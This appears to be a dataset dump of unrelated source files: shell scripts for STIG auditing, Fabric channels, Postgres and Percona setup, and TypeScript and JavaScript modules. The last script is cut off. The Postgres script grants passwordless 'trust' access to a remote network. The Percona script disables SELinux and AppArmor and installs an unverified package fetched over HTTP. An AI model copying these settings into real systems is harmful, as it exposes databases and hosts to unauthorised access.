text stringlengths 1 1.05M |
|---|
#!/bin/bash
# DISA STIG check/remediation driver: enforce ownership and permissions on
# the Solaris audit_binfile plugin directory. Helper functions (report,
# gen_epoch, gen_date, backup_*, get_inode*, percent, print_array, ...) and
# flags (${restore}, ${change}, ${verbose}, ${log}, ${stigid}, ...) are
# presumably provided by tools/bootstrap.sh sourced below — confirm.
# Define the owner of p_dir
owner="root"
# Define the group of p_dir
group="root"
# Define the octal for p_dir
octal=00640
###############################################
# Bootstrapping environment setup
###############################################
# Get our working directory
cwd="$(pwd)"
# Define our bootstrapper location
bootstrap="${cwd}/tools/bootstrap.sh"
# Bail if it cannot be found
if [ ! -f ${bootstrap} ]; then
  echo "Unable to locate bootstrap; ${bootstrap}" && exit 1
fi
# Load our bootstrap
source ${bootstrap}
###############################################
# Global zones only check
###############################################
# Make sure we are operating on global zones
if [ "$(zonename)" != "global" ]; then
  report "${stigid} only applies to global zones" && exit 1
fi
###############################################
# Metrics start
###############################################
# Get EPOCH
s_epoch="$(gen_epoch)"
# Create a timestamp
timestamp="$(gen_date)"
# Whos is calling? 0 = singular, 1 is as group
# (detected by looking for 'stigadm' in the parent process entry)
caller=$(ps -p $PPID | grep -c stigadm)
###############################################
# Perform restoration
###############################################
# If ${restore} = 1 go to restoration mode
if [ ${restore} -eq 1 ]; then
  report "Not yet implemented" && exit 1
fi
###############################################
# STIG validation/remediation
###############################################
# Obtain an array of audit settings regarding 'bin_file' plugin
# (attribute list normalized: ';' -> ' ' and '=' -> ':')
audit_settings=( $(auditconfig -getplugin audit_binfile |
  awk '$0 ~ /Attributes/{print $2}' | tr ';' ' ' | tr '=' ':') )
# Get the auditing filesystem from ${audit_settings[@]}
# (extract the p_dir attribute value, resolve its inode, take the dirname)
audit_folder="$(dirname $(get_inode "$(echo "${audit_settings[@]}" |
  tr ' ' '\n' | grep "^p_dir" | cut -d: -f2)"))"
# If ${change} = 1 apply the remediation; otherwise just validate below
if [ ${change} -eq 1 ]; then
  # Create the backup env
  backup_setup_env "${backup_path}"
  # Create a backup value
  bu_blob="audit_binfile:setplugin:$(echo "${audit_settings[@]}" | tr ' ' ',')"
  # Create a snapshot of the current plugin configuration
  bu_configuration "${backup_path}" "${author}" "${stigid}" "${bu_blob}"
  if [ $? -ne 0 ]; then
    # Print friendly message
    report "Snapshot of current audit plugin values failed..."
    # Stop, we require a backup
    exit 1
  fi
  # Set user ownership on ${audit_folder}
  chown ${owner} ${audit_folder} 2>/dev/null
  # Trap error
  [ $? -ne 0 ] && errors+=("${audit_folder}:${owner}:$(get_inode_user "${audit_folder}")")
  # Set group ownership on ${audit_folder}
  chgrp ${group} ${audit_folder} 2>/dev/null
  # Trap error
  [ $? -ne 0 ] && errors+=("${audit_folder}:${group}:$(get_inode_group "${audit_folder}")")
  # Set permissions on ${audit_folder}
  chmod ${octal} ${audit_folder} 2>/dev/null
  # Trap error
  # NOTE(review): records the current *user* on a failed chmod; probably
  # intended to record the current octal via get_octal — confirm
  [ $? -ne 0 ] && errors+=("${audit_folder}:${octal}:$(get_inode_user "${audit_folder}")")
  # Restart the auditd service
  audit -s 2>/dev/null
  # Trap error
  [ $? -ne 0 ] && errors+=("auditconfig:service:restart")
fi
# Validate user ownership of the audit folder
cowner="$(get_inode_user "${audit_folder}")"
# Trap the error when the current owner differs from the expected owner
[ "${cowner}" != "${owner}" ] &&
  errors+=("Owner:${audit_folder}:${owner}:${cowner}")
# Show what we examined
inspected+=("Owner:${audit_folder}:${cowner}")
# Validate group ownership
cgroup="$(get_inode_group "${audit_folder}")"
# FIX: compare the current group against the expected group; this check
# previously re-compared ${cowner} to ${owner}, so a wrong group was
# never reported.
[ "${cgroup}" != "${group}" ] &&
  errors+=("Group:${audit_folder}:${group}:${cgroup}")
# Show what we examined
inspected+=("Group:${audit_folder}:${cgroup}")
# Validate octal permissions
coctal="$(get_octal "${audit_folder}")"
# Trap the error when the folder is more permissive than expected
# NOTE(review): -gt compares the digit strings as decimal integers, which
# matches octal ordering for same-width values — confirm get_octal output
# width is stable.
[ "${coctal}" -gt "${octal}" ] &&
  errors+=("Permissions:${audit_folder}:${octal}:${coctal}")
# Show what we examined (label typo "Permissons" fixed)
inspected+=("Permissions:${audit_folder}:${coctal}")
###############################################
# Results for printable report
###############################################
# Derive the pass/fail summary from the number of trapped errors
if [ ${#errors[@]} -eq 0 ]; then
  results="Passed validation"
else
  results="Failed validation"
fi
###############################################
# Report generation specifics
###############################################
# Footer values expected by the report helpers
if [ ${#errors[@]} -eq 0 ]; then
  passed=1
  failed=0
else
  passed=0
  failed=${#errors[@]}
fi
# Calculate a percentage from applied modules & errors incurred
percentage=$(percent ${passed} ${failed})
# Emit the failed & validated arrays into ${log}
show_details() {
  [ ${#errors[@]} -gt 0 ] && print_array ${log} "errors" "${errors[@]}"
  [ ${#inspected[@]} -gt 0 ] && print_array ${log} "validated" "${inspected[@]}"
}
if [ ${caller} -eq 0 ]; then
  # Stand-alone invocation: emit the full report and display it
  if [ ${verbose} -eq 1 ]; then
    show_details
  fi
  report "${results}"
  cat ${log}
else
  # Called from stigadm: emit a module-style header/footer instead
  module_header "${results}"
  if [ ${verbose} -eq 1 ]; then
    show_details
  fi
  module_footer
fi
###############################################
# Return code for larger report
###############################################
# Return an error/success code (0 = success, otherwise the error count)
exit ${#errors[@]}
# Date: 2018-09-05
#
# Severity: CAT-I
# Classification: UNCLASSIFIED
# STIG_ID: V0047875
# STIG_Version: SV-60747r1
# Rule_ID: SOL-11.1-010450
#
# OS: Solaris
# Version: 11
# Architecture: Sparc X86
#
# Title: The operating system must protect audit information from unauthorized modification.
# Description: The operating system must protect audit information from unauthorized modification.
|
#!/bin/sh
# Point iTerm2 at the preferences stored in the dotfiles repo (macOS only).
# Requires $DOTFILES to point at the dotfiles checkout.
[ "$(uname -s)" != "Darwin" ] && exit 0
# FIX: abort when DOTFILES is unset/empty instead of silently writing
# into "/iterm/...", and stop on any failing command.
set -e
: "${DOTFILES:?DOTFILES must be set}"
# Rewrite the example plist, replacing the original author's home directory
# with the current user's home.
sed "s;/Users/mah7788;$HOME;g" \
  "$DOTFILES"/iterm/com.googlecode.iterm2.plist.example > "$DOTFILES"/iterm/com.googlecode.iterm2.plist
defaults write com.googlecode.iterm2 "PrefsCustomFolder" -string "$DOTFILES/iterm"
defaults write com.googlecode.iterm2 "LoadPrefsFromCustomFolder" -bool true
|
<filename>src/manager.ts
import {
compareWithOriginal,
getPrimaryKeyInfo,
getRelationValues,
getTableName,
getValues,
isSaved,
mapValueProperties,
setSaved,
} from "./utils/models.ts";
import type { Adapter } from "./adapters/adapter.ts";
import { range } from "./utils/number.ts";
import { RelationType } from "./model.ts";
import { ModelQuery } from "./modelquery.ts";
import { Q } from "./q.ts";
/**
 * Same as Partial<T> but goes deeper and makes Partial<T> all its properties and sub-properties.
 */
export type DeepPartial<T> = {
  [P in keyof T]?: T[P] extends Array<infer U> ? Array<DeepPartial<U>>
    : T[P] extends ReadonlyArray<infer U> ? ReadonlyArray<DeepPartial<U>>
    : DeepPartial<T[P]>;
};
/**
 * Query options to find a single record.
 */
export interface FindOneOptions<T> {
  /** Partial property values the record must match. */
  where?: DeepPartial<T>;
  /** Presumably relation names to eagerly load — confirm against ModelQuery. */
  includes?: string[];
}
/**
 * Query options to find multiple records.
 */
export type FindOptions<T> = FindOneOptions<T> & {
  /** Maximum number of records to return. */
  limit?: number;
  /** Number of records to skip before returning results. */
  offset?: number;
};
/**
 * Manager allows you to perform queries to your model.
 */
export class Manager {
  /**
   * Create a model manager.
   *
   * @param adapter the database adapter to perform queries
   */
  constructor(private adapter: Adapter) {}

  /**
   * Query a model.
   *
   * @param modelClass the model you want to query
   */
  public query<T extends Object>(modelClass: { new (): T }): ModelQuery<T> {
    return new ModelQuery(modelClass, this.adapter);
  }

  /**
   * Save a model instance to the database.
   *
   * @param model the model you want to save
   */
  public async save<T extends Object>(model: T): Promise<T>;

  /**
   * Save model instances to the database.
   *
   * @param models the models you want to save
   */
  public async save<T extends Object>(models: T[]): Promise<T[]>;

  /**
   * Save model instance(s) to the database.
   *
   * @param model the model (or models) you want to save
   */
  public async save<T extends Object>(model: T | T[]): Promise<T | T[]> {
    // If an Array of models is passed, perform INSERT in bulk.
    // Otherwise, check if the model is already saved to the
    // database or not. If it is, perform update instead.
    if (Array.isArray(model)) {
      // We wrap everything in a transaction, which will undo every
      // change in the database if one of the queries fails.
      await this.adapter.transaction(async () => {
        // We need to group the models by their constructor first
        // in order to perform one bulk insert per table.
        for (const [key, value] of this.groupModels(model)) {
          const insert: T[] = [];
          // If one of the models is already saved, perform UPDATE.
          for (const data of value) {
            !data.isSaved
              ? insert.push(data.model)
              : await this.update(data.model);
          }
          // FIX: only issue the INSERT when there is something to
          // insert; an empty value list would produce an invalid
          // statement and skew the id-range logic in bulkInsert.
          if (insert.length > 0) {
            await this.bulkInsert(key, insert);
          }
        }
      });
    } else {
      // If the record is saved, we assume that the user wants to update it.
      // Otherwise, create a new record in the database.
      isSaved(model)
        ? await this.update(model)
        : await this.bulkInsert(model.constructor, [model]);
    }
    return model;
  }

  /**
   * Remove given model instance from the database.
   *
   * @param model the model you want to remove.
   */
  public async remove<T extends Object>(model: T): Promise<T>;

  /**
   * Remove given model instances from the database.
   *
   * @param model the models you want to remove.
   */
  public async remove<T extends Object>(model: T[]): Promise<T[]>;

  /**
   * Remove given model(s) from the database.
   *
   * @param model the model (or models) you want to remove.
   */
  public async remove<T extends Object>(model: T | T[]): Promise<T | T[]> {
    if (Array.isArray(model)) {
      // Just like save, wrap everything in a transaction. This will undo
      // every change in the database if one of the queries fails.
      await this.adapter.transaction(async () => {
        for (const [key, value] of this.groupModels(model).entries()) {
          const tableName = getTableName(key);
          const primaryKeyInfo = getPrimaryKeyInfo(key);
          // Holds the primary keys of the models to delete.
          const ids: number[] = [];
          // Holds the model instances to clear their original values.
          const models: T[] = [];
          // Only delete saved models.
          for (const item of value) {
            if (item.isSaved) {
              ids.push((item.model as any)[primaryKeyInfo.propertyKey]);
              models.push(item.model);
            }
          }
          // FIX: nothing saved in this group — skip the DELETE so we
          // never emit an empty `IN ()` clause.
          if (ids.length === 0) {
            continue;
          }
          // Perform bulk delete.
          await this.adapter
            .table(tableName)
            .where(primaryKeyInfo.name, Q.in(ids))
            .delete()
            .execute();
          // Set the `isSaved` value to be false on each model
          // and remove their original values.
          for (const item of models) {
            delete (item as any)[primaryKeyInfo.propertyKey];
            setSaved(item, false);
          }
        }
      });
    } else {
      const tableName = getTableName(model.constructor);
      const primaryKeyInfo = getPrimaryKeyInfo(model.constructor);
      // Only remove model if it's already saved
      if (isSaved(model)) {
        const id = (model as any)[primaryKeyInfo.propertyKey];
        await this.adapter
          .table(tableName)
          .where(primaryKeyInfo.name, id)
          .delete()
          .execute();
        // Remove the primary key
        delete (model as any)[primaryKeyInfo.propertyKey];
        // Set the `isSaved` value to be false and remove the original values
        setSaved(model, false);
      }
    }
    return model;
  }

  /**
   * Perform update to a model. Only issues an UPDATE when the model's
   * values differ from its last-saved snapshot.
   *
   * @param model the model you want to update.
   */
  private async update<T extends Object>(model: T): Promise<T> {
    const tableName = getTableName(model.constructor);
    const primaryKeyInfo = getPrimaryKeyInfo(model.constructor);
    const { isDirty, diff } = compareWithOriginal(model);
    if (isDirty) {
      await this.adapter
        .table(tableName)
        .where(
          primaryKeyInfo.name,
          (model as any)[primaryKeyInfo.propertyKey],
        )
        .update(diff)
        .execute();
      // Save the model's original values
      setSaved(model, true);
    }
    return model;
  }

  /**
   * Group models by their constructor, remembering each model's original
   * position and saved state.
   */
  private groupModels<T extends Object>(models: T[]) {
    return models.reduce((prev, next, index) => {
      const previousModels = prev.get(next.constructor);
      const data = { model: next, index, isSaved: isSaved(next) };
      prev.set(
        next.constructor,
        previousModels ? previousModels.concat(data) : [data],
      );
      return prev;
    }, new Map<Function, { model: T; index: number; isSaved: boolean }[]>());
  }

  /**
   * Insert multiple records to the database efficiently.
   *
   * @param modelClass the constructor the models share
   * @param models the model instances to insert
   */
  private async bulkInsert<T extends Object>(
    modelClass: Function,
    models: T[],
  ): Promise<T[]> {
    // FIX: guard against an empty batch; an INSERT without values is
    // invalid and the id-range arithmetic below would be wrong.
    if (models.length === 0) {
      return models;
    }
    const tableName = getTableName(modelClass);
    const primaryKeyInfo = getPrimaryKeyInfo(modelClass);
    // Get all model values
    const values = models.map((model) => {
      const values = getValues(model);
      // If there's a belongs to relationship, add it to the INSERT statement
      for (const relation of getRelationValues(model)) {
        if (relation.description.type === RelationType.BelongsTo) {
          values[relation.description.targetColumn] = relation.value as number;
        }
      }
      return values;
    });
    // Build the query
    const query = this.adapter.table(tableName).insert(values);
    // The postgres adapter doesn't have any equivalent `lastInsertedId`
    // property. So, we need to manually return the primary key.
    if (this.adapter.dialect === "postgres") {
      query.returning(primaryKeyInfo.name);
    }
    // Execute the query
    const result = await query.execute();
    // Get last inserted id
    const lastInsertedId = this.adapter.dialect === "postgres"
      ? result[result.length - 1][primaryKeyInfo.name] as number
      : this.adapter.lastInsertedId;
    // NOTE(review): assumes ids were assigned sequentially ending at
    // `lastInsertedId`; racy under concurrent writers — confirm.
    const ids = range(
      lastInsertedId + 1 - models.length,
      lastInsertedId,
    );
    // Assign values to the models
    for (const [index, model] of models.entries()) {
      // Get the model values that were sent to the database
      // and map column names from `name` to `propertyKey`.
      const value = mapValueProperties(
        model.constructor,
        values[index],
        "propertyKey",
      );
      // Set the primary key
      value[primaryKeyInfo.propertyKey] = ids[index];
      // Populate empty properties with default value
      Object.assign(model, value);
      // If there's a has many relationship, update the foreign key
      for (const relation of getRelationValues(model)) {
        if (relation.description.type === RelationType.HasMany) {
          const ids = relation.value as number[];
          const tableName = getTableName(relation.description.getModel());
          const relationPkInfo = getPrimaryKeyInfo(
            relation.description.getModel(),
          );
          await this.adapter
            .table(tableName)
            .update({
              [relation.description.targetColumn]:
                (model as any)[primaryKeyInfo.propertyKey],
            })
            .where(relationPkInfo.name, Q.in(ids))
            .execute();
          // Mirror the new foreign key onto the in-memory related records.
          for (let i = 0; i < ids.length; i++) {
            (model as any)[relation.description.propertyKey][i][
              relation.description.targetColumn
            ] = (model as any)[primaryKeyInfo.propertyKey];
          }
        }
      }
      // Update the `isSaved` status and save the original values
      setSaved(model, true);
    }
    return models;
  }
}
|
#!/bin/bash
# Create a Hyperledger Fabric channel.
# Positional arguments:
#   $1 cluster name      $2 channel name      $3 org name
#   $4 orderer name      $5 path to fabric tool binaries
#   $6 path to operate scripts (must contain env.sh)
#   $7 root path where crypto material and channel data are saved
CLUSTER_NAME=$1
CHANNEL_NAME=$2
ORG_NAME=$3
ORDERER_NAME=$4
FABRIC_TOOLS_PATH=$5
FABRIC_OPERATE_SCRIPTS_PATH=$6
SAVE_CERTS_ROOT_PATH=$7
# Abort on any command failure
set -e
source $FABRIC_OPERATE_SCRIPTS_PATH/env.sh
export PATH=$PATH:$FABRIC_TOOLS_PATH
CHANNEL_DATA_DIR="$SAVE_CERTS_ROOT_PATH/$CLUSTER_NAME/channels/$CHANNEL_NAME"
# Lower-cased org name, used in crypto-config directory names
ORG_LOWER_CASE=$(echo ${ORG_NAME} | tr '[A-Z]' '[a-z]')
generate_channel_tx() {
  # Generate the channel creation transaction (channel.tx) from the
  # TwoOrgsChannel profile found in $CHANNEL_DATA_DIR.
  echo
  echo "#################################################################"
  echo "### Generating channel configuration transaction 'channel.tx' ###"
  echo "#################################################################"
  # FIX: quote expansions so paths/names containing spaces cannot
  # word-split or glob.
  configtxgen -configPath "$CHANNEL_DATA_DIR" -profile TwoOrgsChannel -channelID "$CHANNEL_NAME" -outputCreateChannelTx "$CHANNEL_DATA_DIR/channel.tx"
}
create_channel() {
  # Create the channel as the org admin against the orderer, then move the
  # resulting genesis block into the channel data directory.
  export CORE_PEER_LOCALMSPID=${ORG_NAME}MSP
  export FABRIC_CFG_PATH=$SAVE_CERTS_ROOT_PATH/$CLUSTER_NAME/config
  export CORE_PEER_MSPCONFIGPATH=$SAVE_CERTS_ROOT_PATH/$CLUSTER_NAME/crypto-config/peerOrganizations/$ORG_LOWER_CASE-$CLUSTER_NAME/users/Admin@$ORG_LOWER_CASE-$CLUSTER_NAME/msp
  export ORDERER_CA=$SAVE_CERTS_ROOT_PATH/$CLUSTER_NAME/crypto-config/ordererOrganizations/$CLUSTER_NAME/users/Admin@$CLUSTER_NAME/tls/ca.crt
  # FIX: quote $TLS_ENABLED — unquoted, an unset/empty value (it is
  # presumably exported by env.sh — confirm) made this test a syntax
  # error ("unary operator expected") before falling through to else.
  if [ "$TLS_ENABLED" = 'false' ]; then
    peer channel create -o $ORDERER_NAME.$CLUSTER_NAME:7050 -c $CHANNEL_NAME -f $CHANNEL_DATA_DIR/channel.tx
  else
    export CORE_PEER_TLS_ENABLED=true
    peer channel create -o $ORDERER_NAME.$CLUSTER_NAME:7050 -c $CHANNEL_NAME -f $CHANNEL_DATA_DIR/channel.tx --tls --cafile $ORDERER_CA
  fi
  # mv genesis block to channel dir
  mv $CHANNEL_NAME.block $CHANNEL_DATA_DIR
  log -n "create channel:$CHANNEL_NAME success."
}
# Drive the two steps: build channel.tx, then create the channel
echo "Generating channel.tx for $CHANNEL_NAME..."
generate_channel_tx
echo "Create channel $CHANNEL_NAME..."
create_channel
<reponame>ryanlelek/atmosphere
'use strict';
// Modules
var _ = require('lodash');
module.exports = function (environment, config) {
// Ensure environment is an object
if (!_.isObject(environment)) {
throw new Error('Fatal: Provided environment is not an object!');
}
// Merge configuration object, if given
if (_.isObject(config)) {
_.merge(environment, config);
}
return {
get : function (name) {
return environment[name];
}
};
};
|
#!/usr/bin/env bash
# docopt example: CLI defined entirely by the usage text below; docopt
# parses "$@" against it and exports the matched options/arguments.
DOC="Naval Fate.
Usage:
naval_fate.py ship new <name>...
naval_fate.py ship <name> move <x> <y> [--speed=<kn>]
naval_fate.py ship shoot <x> <y>
naval_fate.py mine (set|remove) <x> <y> [--moored|--drifting]
naval_fate.py -h | --help
naval_fate.py --version
Options:
-h --help Show this screen.
--version Show version.
--speed=<kn> Speed in knots [default: 10].
--moored Moored (anchored) mine.
--drifting Drifting mine.
"
# NOTE(review): the bare string below is executed as a command and fails at
# runtime; presumably it is a template placeholder that docopt.sh tooling
# replaces with the generated parser — confirm.
"DOCOPT PARAMS"
eval "$(docopt "$@")"
# Dump every variable docopt defined, for demonstration
declare -p
|
<reponame>AlvaWang/spring-may
package net.bambooslips.demo.jpa.repository;
import net.bambooslips.demo.jpa.model.FinancialForecasting;
import net.bambooslips.demo.jpa.model.FinancialHistorical;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.data.jpa.repository.Query;
import org.springframework.data.repository.query.Param;
import javax.transaction.Transactional;
import java.util.List;
/**
 * Spring Data JPA repository for {@link FinancialForecasting}.
 * Created by Administrator on 2017/4/21.
 */
@Transactional
public interface FinancialForecastingRepository extends JpaRepository<FinancialForecasting, Long> {
    /**
     * Find all forecasts for the given entire id.
     * <p>
     * FIX: the query previously projected only {@code ff.foreId, ff.foreYear},
     * which makes JPA return {@code Object[]} rows at runtime and breaks the
     * declared {@code List<FinancialForecasting>} return type. Select the whole
     * entity instead, matching {@link #findListByEntireId(Long)}.
     *
     * @param entireId the entire id to filter on
     * @return matching forecasts
     */
    @Query(
            "Select ff FROM FinancialForecasting ff WHERE ff.entireId=:entireId "
    )
    List<FinancialForecasting> findByEntireId(@Param("entireId") Long entireId);

    /**
     * Find all forecasts for the given entire id.
     *
     * @param entireId the entire id to filter on
     * @return matching forecasts
     */
    @Query(
            "Select ff FROM FinancialForecasting ff WHERE ff.entireId=:entireId "
    )
    List<FinancialForecasting> findListByEntireId(@Param("entireId") Long entireId);
}
|
#!/bin/bash
## ======================================================================
## vabashvm - https://github.com/borntorun/vabashvm
## Author: João Carvalho
## https://raw.githubusercontent.com/borntorun/vabashvm/master/LICENSE
## ======================================================================
## Install postgres 9.3 Database Server
##
## optional:
## $1 - user in the system to create in server
## $2 - remote_net_access in the form nnn.nnn.nnn.nnn/prefix (no validation is made)
##
## This script was tested successfully in:
## - CentOS 7 (64bit)
## ======================================================================
# if an error occurs stops
#set -e
# ':' default-assignment idiom: only sets the variable when currently unset
: ${_thispackage="postgres"}
: ${_thisfilename=${0##*/}}
printf "\nvabashvm:$(date +"%H:%M:%S"):==>$_thispackage:Running [%s]..." "$0"
#printf -- "[%s]-" $*
# Timestamped, package-prefixed logger; note it runs in a subshell so it
# cannot change the caller's state
output()
{
(printf "\n\t$(date +"%H:%M:%S"):==>$_thispackage:"; printf "$@")
}
: ${_user_="$1"}
: ${_remote_net="$2"}
: ${_data_dir="/var/lib/pgsql/9.3/data/"}
: ${_instal_dir="/usr/local/pgsql/bin"}
output "Installing..."
# Install the PGDG repo, then the server packages
yum -y install http://yum.postgresql.org/9.3/redhat/rhel-7-x86_64/pgdg-centos93-9.3-1.noarch.rpm >/dev/null
[[ $? -eq 0 ]] && output "Repo installed." && yum -y install postgresql93-server postgresql93-contrib >/dev/null
[[ ! $? -eq 0 ]] && output "Error installing package." || {
  output "Package installed.\n"
  # Initialize the cluster and enable the service
  /usr/pgsql-9.3/bin/postgresql93-setup initdb
  [[ ! $? -eq 0 ]] && output "Error: running [postgresql93-setup initdb]."
  systemctl enable postgresql-9.3.service && systemctl start postgresql-9.3.service
  [[ ! $? -eq 0 ]] && output "Error enabling or starting service."
  ## permits remote access (back up configs before editing)
  [[ ! -z $_remote_net ]] && {
    cp "${_data_dir}pg_hba.conf" "${_data_dir}pg_hba.conf.original"
    [[ $? -eq 0 ]] && echo "host all all ${_remote_net} trust" >> "${_data_dir}pg_hba.conf"
    cp "${_data_dir}postgresql.conf" "${_data_dir}postgresql.conf.original"
    [[ $? -eq 0 ]] && sed -i "s|^#listen_addresses.*$|listen_addresses = '*'|" "${_data_dir}postgresql.conf"
  }
  ## create user
  # FIX: gate the optional superuser creation on ${_user_} ($1); it was
  # mistakenly gated on ${_remote_net} (copy-paste of the block above),
  # so no user was created unless a remote network was also supplied.
  [[ ! -z $_user_ ]] && {
    sudo -u postgres createuser -s "$_user_" >/dev/null 2>/dev/null
    [[ ! $? -eq 0 ]] && output "Error: User [%s] not created." "${_user_}"
  }
  # Open the default postgres port and persist the firewall change
  firewall-cmd --permanent --add-port=5432/tcp >/dev/null && firewall-cmd --reload >/dev/null
  [[ ! $? -eq 0 ]] && output "Error enabling firewall.\n"
  systemctl restart postgresql-9.3.service
  [[ ! $? -eq 0 ]] && output "Error starting service."
  # Expose the install dir on PATH for all login shells
  echo "pathmunge ${_instal_dir}/bin"$'\n'"export PATH" >> /etc/profile.d/z_vabashvm_${_thispackage}.sh
}
printf "\nvabashvm:$(date +"%H:%M:%S"):==>$_thispackage:End [%s]." "$0"
exit 0
|
#!/bin/bash
# This script is only tested on CentOS 6.5 and Ubuntu 12.04 LTS with Percona XtraDB Cluster 5.6.
# You can customize variables such as MOUNTPOINT, RAIDCHUNKSIZE and so on to your needs.
# You can also customize it to work with other Linux flavours and versions.
# If you customize it, copy it to either Azure blob storage or Github so that Azure
# custom script Linux VM extension can access it, and specify its location in the
# parameters of DeployPXC powershell script or runbook or Azure Resource Manager CRP template.
CLUSTERADDRESS=${1}   # cluster addresses for gcomm:// (see create_mycnf)
NODEADDRESS=${2}      # this node's wsrep address
NODENAME=$(hostname)
MYSQLSTARTUP=${3}     # mysql init action, e.g. "start" or "bootstrap-pxc"
MYCNFTEMPLATE=${4}    # URL of the my.cnf template fetched by create_mycnf
SECONDNIC=${5}        # optional second NIC device name
MOUNTPOINT="/datadrive"
RAIDCHUNKSIZE=512
RAIDDISK="/dev/md127"
RAIDPARTITION="/dev/md127p1"
# A set of disks to ignore from partitioning and formatting
BLACKLIST="/dev/sda|/dev/sdb"
check_os() {
  # Detect the distro from /proc/version: $isubuntu / $iscentos are set to
  # 0 (grep success) when the respective distro matches.
  grep ubuntu /proc/version > /dev/null 2>&1
  isubuntu=${?}
  grep centos /proc/version > /dev/null 2>&1
  iscentos=${?}
}
scan_for_new_disks() {
  # Looks for unpartitioned disks.
  # Echoes a space-separated list of /dev/sdX devices that are not in
  # ${BLACKLIST} and have no first partition yet.
  declare -a RET
  # NOTE(review): parses `ls` output (fragile for unusual names), and RET
  # is appended to as a string despite the array declaration — the string
  # append lands in element 0, which is what gets echoed. Works, but
  # consider RET+=("$DEV") with "${RET[@]}".
  DEVS=($(ls -1 /dev/sd*|egrep -v "${BLACKLIST}"|egrep -v "[0-9]$"))
  for DEV in "${DEVS[@]}";
  do
    # Check each device if there is a "1" partition. If not,
    # "assume" it is not partitioned.
    if [ ! -b ${DEV}1 ];
    then
      RET+="${DEV} "
    fi
  done
  echo "${RET}"
}
get_disk_count() {
  # Echo the number of entries in the global DISKS array.
  # FIX: the previous loop used DISKCOUNT+=1, which is a *string* append
  # ("0" -> "01" -> "011") unless the variable happens to carry an integer
  # attribute from the caller's `declare -i`; use the array length, which
  # is correct regardless of caller context.
  echo "${#DISKS[@]}"
}
create_raid0_ubuntu() {
  # Ensure mdadm is present (installed from a pinned .deb when missing),
  # then assemble all data disks into one RAID-0 array.
  dpkg -s mdadm
  if [ ${?} -eq 1 ];
  then
    echo "installing mdadm"
    wget --no-cache http://mirrors.cat.pdx.edu/ubuntu/pool/main/m/mdadm/mdadm_3.2.5-5ubuntu4_amd64.deb
    dpkg -i mdadm_3.2.5-5ubuntu4_amd64.deb
  fi
  echo "Creating raid0"
  # Pause udev event processing while the array is being created
  udevadm control --stop-exec-queue
  echo "yes" | mdadm --create "$RAIDDISK" --name=data --level=0 --chunk="$RAIDCHUNKSIZE" --raid-devices="$DISKCOUNT" "${DISKS[@]}"
  udevadm control --start-exec-queue
  # Persist the array definition so it reassembles on boot
  mdadm --detail --verbose --scan > /etc/mdadm.conf
}
create_raid0_centos() {
  # Assemble all data disks into one RAID-0 array (mdadm assumed present).
  echo "Creating raid0"
  yes | mdadm --create "$RAIDDISK" --name=data --level=0 --chunk="$RAIDCHUNKSIZE" --raid-devices="$DISKCOUNT" "${DISKS[@]}"
  mdadm --detail --verbose --scan > /etc/mdadm.conf
}
do_partition() {
  # This function creates one (1) primary partition on the
  # disk, using all available space
  DISK=${1}
  echo "Partitioning disk $DISK"
  # Feed fdisk its interactive answers: new (n) primary (p) partition 1,
  # accept default bounds (blank lines), then write (w).
  echo "n
p
1


w
" | fdisk "${DISK}"
  #> /dev/null 2>&1
  #
  # Use the bash-specific $PIPESTATUS to ensure we get the correct exit code
  # from fdisk and not from echo
  if [ ${PIPESTATUS[1]} -ne 0 ];
  then
    echo "An error occurred partitioning ${DISK}" >&2
    echo "I cannot continue" >&2
    exit 2
  fi
}
add_to_fstab() {
  # Append an fstab entry mounting UUID at MOUNTPOINT unless one exists.
  UUID=${1}
  MOUNTPOINT=${2}
  grep "${UUID}" /etc/fstab >/dev/null 2>&1
  if [ ${?} -eq 0 ];
  then
    echo "Not adding ${UUID} to fstab again (it's already there!)"
  else
    LINE="UUID=${UUID} ${MOUNTPOINT} ext4 defaults,noatime 0 0"
    echo -e "${LINE}" >> /etc/fstab
  fi
}
configure_disks() {
  # Idempotency: if the mountpoint already exists, assume disks are done.
  ls "${MOUNTPOINT}"
  if [ ${?} -eq 0 ]
  then
    return
  fi
  DISKS=($(scan_for_new_disks))
  echo "Disks are ${DISKS[@]}"
  declare -i DISKCOUNT
  DISKCOUNT=$(get_disk_count)
  echo "Disk count is $DISKCOUNT"
  if [ $DISKCOUNT -gt 1 ];
  then
    # Multiple data disks: stripe them into a RAID-0 device first.
    if [ $iscentos -eq 0 ];
    then
      create_raid0_centos
    elif [ $isubuntu -eq 0 ];
    then
      create_raid0_ubuntu
    fi
    do_partition ${RAIDDISK}
    PARTITION="${RAIDPARTITION}"
  else
    # Single disk: partition it directly and discover the partition name.
    DISK="${DISKS[0]}"
    do_partition ${DISK}
    PARTITION=$(fdisk -l ${DISK}|grep -A 1 Device|tail -n 1|awk '{print $1}')
  fi
  echo "Creating filesystem on ${PARTITION}."
  # FIX: extended options must be passed via -E; previously
  # "lazy_itable_init=1" was a positional argument, so mkfs treated it as
  # the target device and the real partition as an fs-option string.
  mkfs -t ext4 -E lazy_itable_init=1 "${PARTITION}"
  mkdir "${MOUNTPOINT}"
  # Pull the partition UUID out of blkid output for a stable fstab entry
  read UUID FS_TYPE < <(blkid -u filesystem ${PARTITION}|awk -F "[= ]" '{print $3" "$5}'|tr -d "\"")
  add_to_fstab "${UUID}" "${MOUNTPOINT}"
  echo "Mounting disk ${PARTITION} on ${MOUNTPOINT}"
  mount "${MOUNTPOINT}"
}
open_ports() {
  # Allow cluster traffic: mysql (3306), SST (4444), Galera group
  # communication (4567/4568), and the mysqlchk health check on 9200
  # (registered in /etc/services by configure_mysql).
  iptables -A INPUT -p tcp -m tcp --dport 3306 -j ACCEPT
  iptables -A INPUT -p tcp -m tcp --dport 4444 -j ACCEPT
  iptables -A INPUT -p tcp -m tcp --dport 4567 -j ACCEPT
  iptables -A INPUT -p tcp -m tcp --dport 4568 -j ACCEPT
  iptables -A INPUT -p tcp -m tcp --dport 9200 -j ACCEPT
  iptables-save
}
disable_apparmor_ubuntu() {
  # Disable AppArmor on Ubuntu.
  /etc/init.d/apparmor teardown
  update-rc.d -f apparmor remove
}
disable_selinux_centos() {
  # Disable SELinux both persistently and for the running system.
  sed -i 's/^SELINUX=.*/SELINUX=disabled/I' /etc/selinux/config
  setenforce 0
}
activate_secondnic_centos() {
  # Bring up the optional second NIC by cloning the eth0 config and
  # pinning the current default gateway into /etc/sysconfig/network.
  if [ -n "$SECONDNIC" ];
  then
